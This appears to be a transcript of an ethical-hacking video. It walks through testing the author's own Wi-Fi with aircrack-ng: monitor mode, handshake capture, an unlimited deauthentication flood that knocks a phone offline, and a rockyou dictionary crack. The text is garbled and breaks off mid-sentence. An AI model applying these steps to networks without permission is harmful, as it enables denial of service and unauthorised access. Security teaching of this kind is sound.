Advanced Wi-Fi Security 101: Test Your Wi-Fi Security Like a Pro | Ethical Hacking

this video it is strictly for educational purposes don't use these methods on networks you don't own or have permission to taste always stay on the right side of the low hey everyone welcome back to another exciting video today we'll explore how Wi-Fi networks can be tested for security flaws using air crack NG a tool used for understanding and securing networks our goal is to help you protect your systems by understanding how attackers might Target them before we dive into the hands on part let's cover a few important prerequisites first to follow along with this tutorial you need to have some basic knowledge of Linux commands if you're not familiar with commands like if config IW config or ping don't worry I have already covered those in a previous video so feel free to check it out before jumping into this one now the tools you will need for this tutorial we'll be using Cali Linux which is my favorite distribution for pation testing if you don't have it installed you can set it up easily on a virtual machine like me and I made a video about this you can check it there is one more important thing your Wi-Fi adapter most Belin adapters aren't suitable for what we're about to do you will need a Wi-Fi adapter that supports monitor mode and packet injection like Alpha devices that appears on the screen right now by the way Alpha didn't sponsor me to say that but I'm using an alpha adapter and I found it very useful and doesn't need any drivers to work lastly and most importantly you'll need a Wi-Fi network that you own or have permission to test in this video I'll be testing my own TB link router to demonstrate how air Croc NG can be used to assess its security to make it clear that this is my own network that I'm testing let me show you a quick screenshot from my tbink routers configuration page as you can see the network name toone matched the target Network I'll be testing today again this demonstration is purely for educational purposes and I strongly encourage you to only test networks you own or have permission to test this verification ensures that we are staying within ethical boundaries ethical hacking is all about securing not attacking all right let's dive into the action start by checking if we have air crack NG installed I will type the command aircrack-ng and as you can see it's not installed on my system this is a great opportunity to show you how to install it it's very easy the terminal is asking if I want to install the package so I just type why here here to confirm once that's done we're good to go next let's check if our Wi-Fi adapter is properly connected we'll use the command IW config right now I don't have my Alpha Wi-Fi adapter connected with this scal Linux machine so it's not showing up in the list I'm going to connect the alpha Wi-Fi adapter now through the US watch closely and you will see an icon pop up in the bottom right corner of VMware this little USB icon confirms that our adapter is recognized now a quick note here if VMware asks whether you want to connect the adapter to your virtual machine or the host make sure to select the virtual machine let's check again using IW config to make sure the Wi-Fi adapter is recognized and connected as you can see our adapter is all set now before we proceed there is an important step we need to take we need to kill any processes that might interfere with our wireless monitoring to do this we run SoDo airmon NG check kill this command is vital because background processes like Network managers can disrupt monitor mode which we will using to capture Wi-Fi traffic now let's talk about the difference between maned mode mode and monitor mode normally your Wi-Fi adapter operates in managed mode which means it's connected to Wi-Fi network and communicates with an access point but to capture all the wireless traffic around us we need to switch to monitor mode which allows our adapter to listen to All Wireless traffic in range it's like switching from being a participant in a conversation to just quietly listening on everyone around you let's switch our adapter into monitor mode by running SoDo airor NG start and then your wireless interface which is W land zero this command activates monitor mode on our adapter great now let's verify that it is in monitor mode I will use IW config more time as you can see the name has changed to w l zero mod which refers to monitor mode which means it's ready to capture Wireless traffic let's clean up the terminal by typing clear to start to Fresh for the next steps all right now that we have our Wi-Fi adapter in monitor mode it's time to start scanning for networks to do that we run the command SoDo aerodom NG and the name of the wireless interface which became W l0 Mo this will show us all the nearby Wi-Fi networks and devices that our adapter can detect let me quickly break down the The Columns you are seeing here starting from the left we have the PSS ID column which is the MAC address of each Network then there is a pwr column which shows the power or signal strength of each Network a lower number here means a stronger signal the beacon column tells us how many Beacon frames the network has sent out while the data column shows the amount of data packets captured so far next we have the CH column which represents the channel each network is operating on then we see the megabyte column showing the maximum speed supported by the network followed by en NC which shows the encryption method being used for example WPA or WPA2 lastly we have the essid which is just the Network's name in my case I'm looking for my network which I have named toone now a feature of aerodom NG is that you can sort the results based on any column you want by pressing the S key I can sort by the BSS ID power or any other Factor let's go ahead and hit s a few times so you can see how it works you can see the order changing each time I press it this can be helpful if you want to sort by signal strength another useful feature is the ability to filter what you see by pressing a we can't toggle between showing just access points just stations which are devices connected to network or both now let's stop the scan since we found the network which is my own network tone I'm just testing this and I want to remind you that everything in this video is for educational purposes only to stop the scan I press contrl plus C now that we have detected the network and gathered its information let's move forward in the new terminal window I'll start by moving to my desktop where I want to keep everything organized CD desktop we're now on the desktop I'll create a new folder to store all the captured files and the dictionary will will use later I'll call this folder test now let's move into that folder CD test great this will keep everything clean and separate from our system files now let's start capturing packets from our Target Network we already know it's bssid which is like the MAC address of the router and we know the channel it's operating on which is Channel 11 in my case to start capturing we will use this command let's break this command down the DW Target part tells aod NG to save the capture data to a file called Target you can name it anything you want the- C11 part specifies that channel which in our case is 11 the -- BSS ID option is where we provide the BSS ID or Mac address of the network finally W l0 Moon which is our wireless interface in monitor mode the goal here is to capture a crucial part of wi-fi security called the four-way handshake so what is this four-way handshake let me explain technically speaking the four-way handshake is a series of message exchanged between a Wi-Fi access point and a device like your laptop or phone when they are establishing a secure connection this is where the network and device authenticate each other and generate encryption keys that will be used to encrypt the data passing Through The Connection by capturing this four-way handshake we get enough information to attempt cracking the password later and remember it's crucial to only do this on networks you own or have permission to test right now the capture is running and we are waiting to capture that handshake now that we are capturing buckets and have our Target Network inside the next step is to speed things up by forcing the devices connected to the network to disconnect and reconnect this will help us capture the four-way hand check faster we can achieve this by running a deauthentication attack using the airpl NG command in this terminal I'm going to run the following command let me break it down the d-d O zero option means we are sending the authentication packets continuously the zero means no limit so it keeps sending until we stop it manually the d a option specifies the BSS ID or Mac address of the target access point and W l0 moon is our wireless adapter in monitor mode before we run the command I'll open another window showing my Mobile screen which is currently connected to the Target Wi-Fi which is mine this will help us to see how the attack affects the devices on the network in real time let's hit enter and see what will happen now the deauthentication attack is running as you can see my mobile is now disconnected from the network and every time I try to reconnect it fails because the attack is continuously sending the authentication packets to the router this is how does attack works it prevents devices from accessing the network temporarily in a real world example a do attack is like floating someone's inbook with emails so quickly that they can't keep up their inbox becomes so full of messages that they can't see or respond to any real emails similarly here the router is being floated with the authentication requests preventing it from keeping devices connected at the same time if you look back at the terminal window where we're monitoring the target Network you will notice the the message WPA hand check has appeared at the top this means we have successfully captured the four-way hand check which is exactly what we were aiming for now that we have that we can stop the attack let's stop the deauthentication attack by pressing contrl C and now if you look at the Mobile screen again you will see that I can successfully reconnect to the network since the attack has stopped next let's stop monitoring the network since we've captured what we need to do that I press contrl C in the window where we're capturing packets now it's important to return our wireless adapter pack to managed mode so it can function normally I'll open a new terminal window to make things clear and to return to managed mode we run SoDo airon NG stop W l0 MO this command stops monitor mode on our wireless adapter let's it check to make sure the adapter is back in managed mode by running IW config again as you can see the adapter is back in managed mode which is its normal State let's clear the terminal to clean things up next since we run Soo Aon NG check kill earlier which killed some Network processes we need to restart our network manager to get everything back to normal we do that by running service network manager restart this will ensure our Network Services are working properly again and finally let's clear the terminal again now that we have captured the hand check the next step is to crack the password using a word list first let's check if we have word list installed we will type word list to see if it's available as expected the terminal is asking if I want to install it so let's go ahead and type why to proceed while that's installing let me explain what word lists are a word list is essentially a dictionary of possible past phrase which we use in a dictionary attack in this type of attack the cracking software Compares each best phrase in the list against the capture hand check until it finds a match one of the most famous word list is Ro you it contains about 14 million of the most commonly used passwords around the world now that the installation is complete let's clear the terminal next let's navigate to the folder where these word lists are stored by typing CD user share or list if we'll list the contents of this folder by typing LS you'll see the file we are going to use called ro. txd Dogz this is a compressed file we will copy the file to our project folder on the desktop where we have the captured handshake files this keeps everything organized in one place CP R. T XT and the path now let's navigate back to our project folder we will check to make sure the file covered successfully P running LS as you can see the ru.

txt gz file is here let's now extract it using the G unzip command let's check again with ls to make sure the file has been unzipped now we have the uncompressed roq file which contains around 14 million of the most commonly used best phrase it's incredible to think how many passwords out there are vulnerable because people use simpler or common phrases make sure to avoid using predictable passwords like 1 2 3 4 until 6 or password or anything like that and if you are a real Madrid fan as we'll see in a pit it's probably not a good idea to set your password to Real Madrid now let's see with the air crack NG command to start cracking the password we will be using the capture hand check file and the ru the txt word list by this command aircrack NG and then the file name with cab extension DW and the word list which is ru. txt let me explain what this command does t-01 is the file where our captured hand check is stored and dw. txt specifies the word list we want to use essentially air C NG will go through each past phrase in the word list and compare it to the handshake until it finds the correct one as you can see a c NG is now processing each password in the world list depending on the complexity of the password this could take some time we'll let it run and as soon as it finds a match it will display the password there it is we found the password when the cracking process reached 99.